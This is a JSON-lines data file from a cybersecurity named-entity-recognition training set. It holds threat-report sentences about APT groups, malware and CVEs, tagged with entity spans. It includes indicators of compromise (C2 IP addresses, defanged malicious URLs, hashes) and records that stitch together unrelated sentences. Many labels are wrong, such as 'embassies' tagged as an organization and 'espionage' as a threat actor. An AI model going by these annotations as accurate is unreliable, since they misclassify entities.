of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan . 
PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts .", "spans": {"ORGANIZATION: Proofpoint": [[70, 80]], "ORGANIZATION: embassies": [[199, 208]], "THREAT_ACTOR: PLATINUM": [[242, 250]], "VULNERABILITY: zero-day": [[285, 293]]}, "info": {"id": "cyberner_stix_train_007762", "source": "cyberner_stix_train"}} {"text": "In this case , the threat actors used compromised credentials to log into an Internet-facing Citrix server to gain access to the network .", "spans": {"TOOL: Internet-facing": [[77, 92]], "TOOL: Citrix": [[93, 99]]}, "info": {"id": "cyberner_stix_train_007763", "source": "cyberner_stix_train"}} {"text": "One is an open source utility used to remotely issue commands on a Windows host from a Linux host .", "spans": {"SYSTEM: Windows": [[67, 74]], "SYSTEM: Linux": [[87, 92]]}, "info": {"id": "cyberner_stix_train_007764", "source": "cyberner_stix_train"}} {"text": "What we do know is that several of the malicious files were submitted to a public malware analysis site from the Palestinian Territories .", "spans": {}, "info": {"id": "cyberner_stix_train_007765", "source": "cyberner_stix_train"}} {"text": "For full details , please reference our 2014 report , APT28 : A Window into Russia ’s Cyber Espionage Operations ? APT28 employs a suite of malware with features indicative of the group ’s plans for continued operations , as well as the group ’s access to resources and skilled developers .", "spans": {"THREAT_ACTOR: APT28": [[54, 59], [115, 120]], "SYSTEM: Window": [[64, 70]]}, "info": {"id": "cyberner_stix_train_007766", "source": "cyberner_stix_train"}} {"text": "Upload data was queued and transmitted via HTTP PUT requests to an endpoint on the C2 . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . 
MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East .", "spans": {"THREAT_ACTOR: group": [[92, 97]], "VULNERABILITY: PDF exploits": [[129, 141]], "VULNERABILITY: Adobe Flash Player exploits": [[144, 171]], "VULNERABILITY: CVE-2012-0158": [[189, 202]], "VULNERABILITY: Word exploits": [[203, 216]], "TOOL: Tran Duy Linh": [[263, 276]], "THREAT_ACTOR: MuddyWater": [[285, 295]]}, "info": {"id": "cyberner_stix_train_007767", "source": "cyberner_stix_train"}} {"text": "In addition , OceanLotus is also known to use ‘watering hole attacks’ , which involve the compromise of a website that the victim is likely to visit . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": {"THREAT_ACTOR: OceanLotus": [[14, 24]], "FILEPATH: malicious documents": [[180, 199]], "VULNERABILITY: CVE-2017-0199": [[211, 224]], "MALWARE: LATENTBOT": [[250, 259]], "MALWARE: malware": [[260, 267]]}, "info": {"id": "cyberner_stix_train_007768", "source": "cyberner_stix_train"}} {"text": "Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": {}, "info": {"id": "cyberner_stix_train_007769", "source": "cyberner_stix_train"}} {"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples Sometimes , however , certain samples made use of domain names for HTTP communication . Uploads files to the attackers ’ server . 
cmd /c \" D:\\pack", "spans": {"ORGANIZATION: eSurv": [[28, 33]], "ORGANIZATION: Google": [[44, 50]], "MALWARE: Exodus One": [[88, 98]]}, "info": {"id": "cyberner_stix_train_007770", "source": "cyberner_stix_train"}} {"text": "In personally responding to several incidents across multiple industry sectors since early 2018 matching TTPs from the TRITON S-MAL/TRISIS event , these items proved consistent and supported the creation of the XENOTIME activity group .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[119, 138]], "THREAT_ACTOR: XENOTIME": [[211, 219]]}, "info": {"id": "cyberner_stix_train_007771", "source": "cyberner_stix_train"}} {"text": "EventBot is particularly interesting because it is in such early stages . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": {"ORGANIZATION: EventBot": [[0, 8]], "TOOL: Trojan.Naid": [[179, 190]], "MALWARE: Backdoor.Moudoor": [[193, 209]], "TOOL: Backdoor.Hikit": [[216, 230]], "VULNERABILITY: CVE-2012-0158": [[292, 305]]}, "info": {"id": "cyberner_stix_train_007772", "source": "cyberner_stix_train"}} {"text": "This helps the C2 define what actions it can do before being detected on the mobile device . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . ShadowHammer : 141.105.71.116 . 
The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": {"ORGANIZATION: governments": [[114, 125]], "THREAT_ACTOR: Moafee": [[203, 209]], "THREAT_ACTOR: ShadowHammer": [[281, 293]], "IP_ADDRESS: 141.105.71.116": [[296, 310]], "VULNERABILITY: CVE-2022 - 41123": [[325, 341]], "VULNERABILITY: DLL hijacking3": [[375, 389]]}, "info": {"id": "cyberner_stix_train_007773", "source": "cyberner_stix_train"}} {"text": "It was made clear during communications that INDRIK SPIDER is not willing to negotiate on the ransom amount , explicitly stating that the victim can use multiple Bitcoin exchanges to obtain the number of BTC required , and the exchange rate should be calculated based on the rate posted on the cryptocurrency exchange Bittrex . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": {"ORGANIZATION: communications": [[25, 39]], "ORGANIZATION: cryptocurrency": [[294, 308]], "TOOL: Flash": [[369, 374]], "VULNERABILITY: zero day": [[375, 383]]}, "info": {"id": "cyberner_stix_train_007774", "source": "cyberner_stix_train"}} {"text": "The menus for PlugX 's server-side component are written exclusively in Standard Chinese ( Mandarin ) , suggesting that PlugX operators are familiar with this language .", "spans": {"MALWARE: PlugX": [[14, 19], [120, 125]], "TOOL: Standard Chinese": [[72, 88]], "TOOL: Mandarin": [[91, 99]]}, "info": {"id": "cyberner_stix_train_007775", "source": "cyberner_stix_train"}} {"text": "All encrypted archives can be divided into two groups : the first comprises Game321.res , Game322.res , Game323.res and Game642.res – and these are used in the initial phase of infection , while the second group : Game324.res and Game644.res , are used in the main phase . 
Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry . Some criminals also sell remote access to these systems , acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves . A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": {"ORGANIZATION: Dragos": [[412, 418]], "ORGANIZATION: ICS industry": [[464, 476]], "THREAT_ACTOR: Polish student": [[652, 666]], "SYSTEM: a remote controller device": [[672, 698]], "SYSTEM: the Lodz city tram system": [[717, 742]]}, "info": {"id": "cyberner_stix_train_007776", "source": "cyberner_stix_train"}} {"text": "We have observed this recent wave of Zyklon malware being delivered primarily through spam emails . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"THREAT_ACTOR: Zyklon": [[37, 43]], "TOOL: spam emails": [[86, 97]], "TOOL: emails": [[152, 158]], "FILEPATH: Microsoft Word documents": [[164, 188]], "VULNERABILITY: CVE-2017-0199": [[200, 213]]}, "info": {"id": "cyberner_stix_train_007777", "source": "cyberner_stix_train"}} {"text": "update.exe module and Xenotix Python Keylogger code comparison ‘ addStartup ’ method from msconf.exe module ‘ addStartup ’ method from Xenotix Python Keylogger Distribution We found several landing pages that spread the Android implants . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” . 
It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial , economic , and trade policy , typically using publicly available RATs such as PoisonIvy , as well as some non-public backdoors .", "spans": {"SYSTEM: Xenotix Python Keylogger": [[22, 46], [135, 159]], "SYSTEM: Android": [[220, 227]], "MALWARE: SWAnalytics": [[308, 319]], "MALWARE: RATs": [[616, 620]], "MALWARE: PoisonIvy": [[629, 638]], "MALWARE: non-public backdoors": [[657, 677]]}, "info": {"id": "cyberner_stix_train_007778", "source": "cyberner_stix_train"}} {"text": "The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: activity group": [[153, 167]], "THREAT_ACTOR: group": [[210, 215]], "MALWARE: NetTraveler": [[353, 364]], "VULNERABILITY: exploit": [[378, 385]], "VULNERABILITY: CVE-2012-0158": [[386, 399]], "MALWARE: NetTraveler Trojan": [[415, 433]]}, "info": {"id": "cyberner_stix_train_007779", "source": "cyberner_stix_train"}} {"text": "Using the C&C server , the attackers then instructed the compromised computer to provide the infected computer ’s IP address , the names of all other computers in the workgroup or domain , and dumps of Windows cached password hashes .", "spans": {"TOOL: C&C": [[10, 13]], "SYSTEM: Windows": [[202, 209]]}, "info": {"id": "cyberner_stix_train_007780", "source": "cyberner_stix_train"}} {"text": "] qwq-japan [ . Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine . 
When the send loop has fewer than 60 bytes to send (e.g., a small file or the last part of a file), the send function transmits the remaining bytes with a shorter data . Typically , they steal information , including intellectual property , personally identifying information , and money to fund or further espionage and exploitation causes .", "spans": {"THREAT_ACTOR: APT28": [[88, 93]]}, "info": {"id": "cyberner_stix_train_007781", "source": "cyberner_stix_train"}} {"text": "PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) .", "spans": {"VULNERABILITY: CVE-2017-7269": [[16, 29]], "ORGANIZATION: Department of Homeland Security": [[225, 256]], "ORGANIZATION: DHS": [[259, 262]]}, "info": {"id": "cyberner_stix_train_007782", "source": "cyberner_stix_train"}} {"text": "The majority of NewsBeef targets that Kaspersky researchers have observed are located in SA . 
As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload .", "spans": {"THREAT_ACTOR: NewsBeef": [[16, 24]], "ORGANIZATION: Kaspersky": [[38, 47]], "ORGANIZATION: Proofpoint": [[97, 107]], "FILEPATH: MSIL payload": [[239, 251]]}, "info": {"id": "cyberner_stix_train_007783", "source": "cyberner_stix_train"}} {"text": "This was followed by additional details from Kaspersky in a blog post published on 16th July .", "spans": {"ORGANIZATION: Kaspersky": [[45, 54]]}, "info": {"id": "cyberner_stix_train_007784", "source": "cyberner_stix_train"}} {"text": "One of the differences was a particularly clever evasion technique : to our knowledge this has never been observed in use .", "spans": {}, "info": {"id": "cyberner_stix_train_007785", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87726 [ . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . This group reportedly compromised the Hillary Clinton campaign , the Democratic National Committee , and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election .", "spans": {"THREAT_ACTOR: actor-controlled": [[117, 133]], "TOOL: servers": [[134, 141]], "ORGANIZATION: Democratic National Committee": [[247, 276]], "ORGANIZATION: Democratic Congressional Campaign Committee": [[287, 330]]}, "info": {"id": "cyberner_stix_train_007786", "source": "cyberner_stix_train"}} {"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website . 
The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword.exe . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"TOOL: MoonWind samples": [[188, 204]], "TOOL: legitimate website": [[289, 307]], "MALWARE: WATERSPOUT backdoor": [[314, 333]], "MALWARE: HIGHTIDE backdoors": [[375, 393]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[435, 457]], "FILEPATH: SETTINGS\\Temp\\winword.exe": [[499, 524]]}, "info": {"id": "cyberner_stix_train_007787", "source": "cyberner_stix_train"}} {"text": "These actors scan websites for vulnerabilities to exploit to illicitly access databases . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": {"THREAT_ACTOR: actors": [[6, 12]], "THREAT_ACTOR: APT10": [[90, 95]], "MALWARE: MSP networks": [[194, 206]], "ORGANIZATION: customers": [[228, 237]]}, "info": {"id": "cyberner_stix_train_007788", "source": "cyberner_stix_train"}} {"text": "A university class student list including the C & C domain registrant Due to poor privacy practices on the part of our culprit ’ s university , we now know his date of birth ( probably : he seemingly used his birth year as part of his Gmail address , as further partial confirmation ) , we know that he was a student and what university he attended . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . 
File type: PE32 executable (GUI) Intel 80386 , for MS Windows .", "spans": {"SYSTEM: Gmail": [[235, 240]], "MALWARE: phishing email": [[375, 389]], "ORGANIZATION: MS Windows": [[493, 503]]}, "info": {"id": "cyberner_stix_train_007789", "source": "cyberner_stix_train"}} {"text": "The targeted individuals did not follow any significant pattern , and the email addresses were found easily using web search engines .", "spans": {"TOOL: email": [[74, 79]]}, "info": {"id": "cyberner_stix_train_007790", "source": "cyberner_stix_train"}} {"text": "At the same time , it 's extremely flexible , making it a very effective tool for malicious actors . Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet .", "spans": {"THREAT_ACTOR: BITTER APT’s": [[125, 137]], "ORGANIZATION: government sites": [[207, 223]], "ORGANIZATION: enterprises": [[240, 251]], "THREAT_ACTOR: APT33": [[263, 268]], "ORGANIZATION: aviation companies": [[330, 348]]}, "info": {"id": "cyberner_stix_train_007791", "source": "cyberner_stix_train"}} {"text": "] today This is the first version that shows the code organization evolution that will continue to be used on all other functions throughout this malware . Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date . Both backdoors were dropped from malicious documents built utilizing the “ Tran Duy Linh ” exploit kit , which exploited CVE-2012-0158 . 
BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": {"ORGANIZATION: Symantec": [[156, 164]], "TOOL: Tran Duy Linh": [[394, 407]], "VULNERABILITY: CVE-2012-0158": [[440, 453]], "MALWARE: BADCALL": [[456, 463]], "MALWARE: Bankshot": [[526, 534]], "MALWARE: BendyBear": [[626, 635]]}, "info": {"id": "cyberner_stix_train_007792", "source": "cyberner_stix_train"}} {"text": "After the profile is downloaded , the iOS system will first ask users to review the profile in their settings if they want to install it . On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . The malware sends another TXT query with the receiver . The new year is almost upon us , and 2022 has been a game of ransomware hardball .", "spans": {"SYSTEM: iOS": [[38, 41]], "THREAT_ACTOR: APT16": [[187, 192]], "ORGANIZATION: financial": [[272, 281]], "ORGANIZATION: high-tech companies": [[286, 305]]}, "info": {"id": "cyberner_stix_train_007793", "source": "cyberner_stix_train"}} {"text": "] infoacount-manager [ . Attacks using this tool were still active as of April 2016 . WEBC2 variants may include a server component that provides a simple C2 interface to the intruder . 
For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple “ yes ” or “ no ” push notification .", "spans": {"MALWARE: WEBC2": [[86, 91]], "TOOL: C2": [[155, 157]], "SYSTEM: Cisco Duo": [[350, 359]]}, "info": {"id": "cyberner_stix_train_007794", "source": "cyberner_stix_train"}} {"text": "This separate malware was installed by an unknown attack as “ AppData\\Local\\Microsoft\\Windows\\msdeltemp.dll ” ( md5: CE8B99DF8642C065B6AF43FDE1F786A3 ) .", "spans": {"FILEPATH: AppData\\Local\\Microsoft\\Windows\\msdeltemp.dll": [[62, 107]], "FILEPATH: CE8B99DF8642C065B6AF43FDE1F786A3": [[117, 149]]}, "info": {"id": "cyberner_stix_train_007795", "source": "cyberner_stix_train"}} {"text": "We found 280 such apps in the past three months . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . This group was previously tracked under two distinct groups , APT34 and OilRig , but was combined due to additional reporting giving higher confidence about the overlap of the activity .", "spans": {"MALWARE: Hussarini": [[104, 113]], "THREAT_ACTOR: APT34": [[316, 321]], "THREAT_ACTOR: OilRig": [[326, 332]]}, "info": {"id": "cyberner_stix_train_007796", "source": "cyberner_stix_train"}} {"text": "In June and August 2019 , BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[26, 42]], "MALWARE: PlugX": [[53, 58]]}, "info": {"id": "cyberner_stix_train_007797", "source": "cyberner_stix_train"}} {"text": "During our investigation , we observed the C2 server sending multiple “ balance ” commands to different institutions , presumably to query the victim ’ s financial account balances . 
The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region . Moreover , this kind of infrastructure uses HTTPS and the flow is encrypted that makes man-in-the-middle interception more complicated for the defender . Indicators of attack are similar to IOCs , but rather than focusing on forensic analysis of a compromise that has already taken place , indicators of attack focus on identifying attacker activity while an attack is in process .", "spans": {"THREAT_ACTOR: OilRig group": [[187, 199]], "THREAT_ACTOR: APT34": [[206, 211]], "THREAT_ACTOR: Helix Kitten": [[214, 226]], "THREAT_ACTOR: espionage": [[258, 267]]}, "info": {"id": "cyberner_stix_train_007798", "source": "cyberner_stix_train"}} {"text": "There the user is prompted to download and install a Trojan imitating an Adobe Flash Player update . Turla is a notorious group that has been targeting governments . We will continue to monitor new activities of the Winnti Group and will publish relevant information on our blog . Revenge intrinsic Disgruntled employees or former employees are those that typically commit the lions share of revengebased cyberattacks .", "spans": {"SYSTEM: Adobe Flash Player": [[73, 91]], "THREAT_ACTOR: Turla": [[101, 106]], "ORGANIZATION: governments": [[152, 163]], "THREAT_ACTOR: Winnti Group": [[216, 228]]}, "info": {"id": "cyberner_stix_train_007799", "source": "cyberner_stix_train"}} {"text": "A graphical representation of the data structure used to store each VM opcode The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization ( ASLR ) . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . 
Payload Samples ( Win32/Winnti.AG ) Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": {"ORGANIZATION: energy": [[284, 290]], "ORGANIZATION: government": [[293, 303]], "ORGANIZATION: technology sectors": [[310, 328]], "FILEPATH: Win32/Winnti.AG": [[414, 429]], "THREAT_ACTOR: Hack520": [[511, 518], [605, 612]], "TOOL: Twitter": [[564, 571]]}, "info": {"id": "cyberner_stix_train_007800", "source": "cyberner_stix_train"}} {"text": "At this point we had collected nearly thirty samples of Zebrocy in relation to the original sample and its associated C2 domain .", "spans": {"MALWARE: Zebrocy": [[56, 63]], "TOOL: C2": [[118, 120]]}, "info": {"id": "cyberner_stix_train_007801", "source": "cyberner_stix_train"}} {"text": "It ’ s interesting that Triout , which is detected by Bitdefender ’ s machine learning algorithms , was first submitted from Russia , and most scans/reports came from Israel . Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . 
Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": {"MALWARE: Triout": [[24, 30]], "ORGANIZATION: Bitdefender": [[54, 65]], "MALWARE: Carbanak": [[349, 357]], "THREAT_ACTOR: attackers": [[358, 367]]}, "info": {"id": "cyberner_stix_train_007802", "source": "cyberner_stix_train"}} {"text": "With much of our research , our initial direction and discovery of emerging threats is generally some combination of previously observed behavioral rulesets or relationships .", "spans": {}, "info": {"id": "cyberner_stix_train_007803", "source": "cyberner_stix_train"}} {"text": "The decompiled code shows the decryption routine that unpacks the embedded Spark backdoor .", "spans": {"MALWARE: Spark backdoor": [[75, 89]]}, "info": {"id": "cyberner_stix_train_007804", "source": "cyberner_stix_train"}} {"text": "So we recommend installing an anti-virus solution on your Android device . At this time , we do not believe that the attackers found a new ASA exploit . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": {"ORGANIZATION: we": [[90, 92]], "THREAT_ACTOR: attackers": [[117, 126]], "VULNERABILITY: ASA": [[139, 142]], "VULNERABILITY: exploit": [[143, 150]], "MALWARE: Equation Editor": [[189, 204]], "MALWARE: EQNEDT32.EXE": [[207, 219]], "ORGANIZATION: Microsoft": [[239, 248]]}, "info": {"id": "cyberner_stix_train_007805", "source": "cyberner_stix_train"}} {"text": "Service , the Achilles ’ heel of Android security 22 May 2020 - 03:00PM ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions , notably wiping out the victim ’ s bank account or cryptocurrency wallet and taking over their email or social media accounts . 
In the past , Sednit used a similar technique for credential phishing . The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) .", "spans": {"SYSTEM: Android": [[33, 40], [126, 133]], "ORGANIZATION: ESET": [[72, 76]], "THREAT_ACTOR: Sednit": [[326, 332]], "MALWARE: KiloAlfa": [[417, 425]]}, "info": {"id": "cyberner_stix_train_007806", "source": "cyberner_stix_train"}} {"text": "Return the translated object .", "spans": {}, "info": {"id": "cyberner_stix_train_007807", "source": "cyberner_stix_train"}} {"text": "The screenshot below shows SpyNote RAT scanning for Wi-Fi and enabling it if a known channel is found : Additional features - SpyNote RAT could click photos using the device 's camera , based on commands from C & C . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"MALWARE: SpyNote RAT": [[27, 38], [126, 137]], "ORGANIZATION: Group-IB": [[217, 225]], "THREAT_ACTOR: cybercrime gang": [[345, 360]], "ORGANIZATION: banks": [[386, 391]], "ORGANIZATION: e-payment": [[394, 403]], "ORGANIZATION: financial institutions": [[416, 438]], "MALWARE: Carbanak": [[488, 496]], "MALWARE: Cobalt": [[501, 507]]}, "info": {"id": "cyberner_stix_train_007808", "source": "cyberner_stix_train"}} {"text": "The espionage group , which according to the U.S. 
Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"ORGANIZATION: Department of Homeland Security": [[50, 81]], "ORGANIZATION: DHS": [[84, 87]], "ORGANIZATION: Federal Bureau of Investigation": [[98, 129]], "ORGANIZATION: FBI": [[132, 135]]}, "info": {"id": "cyberner_stix_train_007809", "source": "cyberner_stix_train"}} {"text": "APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "ORGANIZATION: rockers": [[22, 29]], "ORGANIZATION: dissidents": [[34, 44]], "TOOL: email": [[160, 165]]}, "info": {"id": "cyberner_stix_train_007810", "source": "cyberner_stix_train"}} {"text": "This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations :", "spans": {"MALWARE: Shamoon": [[55, 62]], "TOOL: PowerShell": [[138, 148]]}, "info": {"id": "cyberner_stix_train_007811", "source": "cyberner_stix_train"}} {"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . 
Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits .", "spans": {"MALWARE: ChopShop1": [[0, 9]], "ORGANIZATION: MITRE Corporation": [[46, 63]], "MALWARE: COVELLITE": [[237, 246]], "MALWARE: malware": [[247, 254]], "MALWARE: LAZARUS toolkits": [[289, 305]]}, "info": {"id": "cyberner_stix_train_007812", "source": "cyberner_stix_train"}} {"text": "This division of labor among the cybercriminals can also be seen in the behavior of their Trojans . Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) . Additionally , we published a blog post on a new backdoor named skip-2.0 that targets Microsoft SQL Server . This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": {"THREAT_ACTOR: LuckyMouse": [[161, 171]], "THREAT_ACTOR: EmissaryPanda": [[211, 224]], "THREAT_ACTOR: APT27": [[229, 234]], "MALWARE: backdoor": [[288, 296]], "MALWARE: skip-2.0": [[303, 311]], "TOOL: Microsoft SQL Server": [[325, 345]], "ORGANIZATION: Biderman": [[384, 392]], "ORGANIZATION: Ashley Madison executives": [[403, 428]]}, "info": {"id": "cyberner_stix_train_007813", "source": "cyberner_stix_train"}} {"text": "Like other Zebrocy samples , this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices .", "spans": {"MALWARE: Zebrocy": [[11, 18]], "MALWARE: Trojan": [[34, 40]], "TOOL: C2": [[98, 100]]}, "info": {"id": "cyberner_stix_train_007814", "source": "cyberner_stix_train"}} {"text": "This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat . 
Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": {"MALWARE: Ploutus-D": [[84, 93]], "ORGANIZATION: financial": [[111, 120]], "THREAT_ACTOR: Barium": [[177, 183]], "ORGANIZATION: Microsoft customers": [[197, 216]]}, "info": {"id": "cyberner_stix_train_007815", "source": "cyberner_stix_train"}} {"text": "In February , PINCHY SPIDER released version 5.2 of GandCrab , which is immune to the decryption tools developed for earlier versions of GandCrab and in fact , was deployed the day before the release of the latest decryptor . Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[14, 27]], "TOOL: GandCrab": [[52, 60], [137, 145]], "ORGANIZATION: Symantec": [[226, 234]]}, "info": {"id": "cyberner_stix_train_007816", "source": "cyberner_stix_train"}} {"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines .", "spans": {"MALWARE: malicious Word documents": [[21, 45]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[74, 138]], "VULNERABILITY: CVE-2014-6332": [[150, 163]], "ORGANIZATION: media": [[191, 196]], "THREAT_ACTOR: Turla": [[210, 215]]}, "info": {"id": "cyberner_stix_train_007817", "source": "cyberner_stix_train"}} {"text": "The infected app steals contacts and SMS messages from the user ’ s device and asks for admin permissions . Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans . 
This threat actor stole suspected of stealing €13 million from Bank of Valetta , Malta earlier this year . Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: financial sector": [[188, 204]], "TOOL: Corkow": [[224, 230]], "ORGANIZATION: banking": [[295, 302]]}, "info": {"id": "cyberner_stix_train_007818", "source": "cyberner_stix_train"}} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": {"VULNERABILITY: CVE-2017-10271": [[110, 124]], "TOOL: PowerShell": [[138, 148]], "TOOL: Flash": [[299, 304]], "VULNERABILITY: zero day": [[305, 313]]}, "info": {"id": "cyberner_stix_train_007819", "source": "cyberner_stix_train"}} {"text": "The overlay consisted of a generic credit card grabber targeting social and utility apps , such as Google Play , Facebook , WhatsApp , Chrome , Skype , Instagram and Twitter . The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . 
